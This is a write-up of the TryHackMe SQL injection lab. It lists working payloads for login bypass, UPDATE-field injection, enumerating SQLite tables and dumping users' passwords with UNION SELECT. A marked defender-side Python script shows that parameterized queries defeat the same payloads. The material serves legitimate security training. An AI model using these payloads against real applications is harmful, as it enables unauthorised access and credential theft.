TryHackMe - SQL Injection Lab

SQL Injection lab

Introduction to SQL Injection: Part 1

SQL Injection 1: Input Box Non-String

We have a login page and need to bypass the login. This payload worked: 1 or 1=1; --

Screenshot: bypass login

SQL Injection 2: Input Box String

The payload that worked was: 1' or 1=1; --

Screenshot: SQL Injection 2

SQL Injection 3: URL Injection

For this one to work, we need to intercept the request (there is a client-side check that blocks us from entering special characters). So we first enter legitimate characters and then modify the request live. This payload works: 1' or 1=1; --

Screenshot: initial request

Screenshot: edited request

SQL Injection 4: POST Injection

We proceed the same way and intercept the traffic. This payload worked: 1' or 1=1; -- (it has to be URL-encoded).

Screenshot: original request

Screenshot: edited request

Introduction to SQL Injection: Part 2

SQL Injection 5: UPDATE Statement

We need to log in with the creds 10:toor and then open "Edit Profile". The injection seems to work in the email field, and when we use ',nickName=sqlite_version(),email=' the nickname is replaced by the version string, so the database is SQLite.

Screenshot: sqlite version

With this payload we list the tables: ',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='

Screenshot: list tables

Let's see what is in the secrets table:

',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='

Screenshot: create table

',nickName=(SELECT group_concat(id || "," || author || "," || secret || ":") from secrets),email='

And we get the flag!

Vulnerable Startup: Broken Authentication

Here the payload that worked is: admin' or 1=1 --

Vulnerable Startup: Broken Authentication 2

We can bypass login using the same payload as before.

I won't go into details here; you just need to follow the explanation in the task if you are stuck.

Note: the challenges that I did not cover here can be done by referring to the task in case you are stuck on your own.

Vulnerable Startup: Book Title 1

Using the NULL method we can see that the query returns 4 columns: ') UNION SELECT NULL, NULL, NULL, NULL-- -

Screenshot: null

Using this payload we find the tables: ') UNION SELECT group_concat(tbl_name), group_concat(tbl_name), group_concat(tbl_name), group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- -

Screenshot: get tables

Using this payload we get more information about the users table: ') UNION SELECT sql, sql, sql, sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='users'-- -

Screenshot: users

Finally, using this payload we can dump the users table and get the flag: ') UNION SELECT id, username, password, id from users-- -
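As an added, defender-side illustration (not part of the original writeup or the lab), the script below rebuilds a constructed SQLite database with assumed users and books tables and shows why the login payload admin' or 1=1 -- and the four-column UNION payload above succeed against string-built queries but return nothing once the same queries use bound parameters. Table and column names are assumptions; only the payloads come from this page.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's database. Table and column
# names are assumptions; only the payloads used below come from the writeup.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'flag{constructed}'), (2, 'bob', 'hunter2');
CREATE TABLE books (id INTEGER PRIMARY KEY, title TEXT, author TEXT, year INTEGER);
INSERT INTO books VALUES (1, 'SQL Basics', 'A. Author', 2001);
""")

def login_vulnerable(username, password):
    # Query text is built by string formatting, so a quote in the input
    # closes the literal and everything after it is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(username, password):
    # Bound parameters: SQLite receives the input as a value, never as SQL text.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

def search_vulnerable(title):
    # The original SELECT has four columns, which is why the writeup probes
    # with four NULLs: a UNION must match that column count exactly.
    sql = ("SELECT id, title, author, year FROM books WHERE (title LIKE '%%%s%%')"
           % title)
    return conn.execute(sql).fetchall()

def search_safe(title):
    # Same search, wildcards added inside the SQL and the input bound.
    return conn.execute(
        "SELECT id, title, author, year FROM books WHERE title LIKE '%' || ? || '%'",
        (title,)).fetchall()

if __name__ == "__main__":
    bypass = "admin' or 1=1 --"
    dump = "') UNION SELECT id, username, password, id from users-- -"
    print("vulnerable login: ", login_vulnerable(bypass, "wrong"))  # a username: bypassed
    print("safe login:       ", login_safe(bypass, "wrong"))        # None
    print("vulnerable search:", search_vulnerable(dump))  # book rows plus users rows
    print("safe search:      ", search_safe(dump))        # []
```

The same contrast applies to the UPDATE injection in Part 2: an UPDATE built by concatenation lets the ',nickName=...,email=' payloads add assignments, while a parameterized UPDATE treats the whole string as the email value.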

Vulnerable Startup: Book Title 2

The payload that worked here is this one: title=' union select '1'' union select 1,2,3,password from users-- -
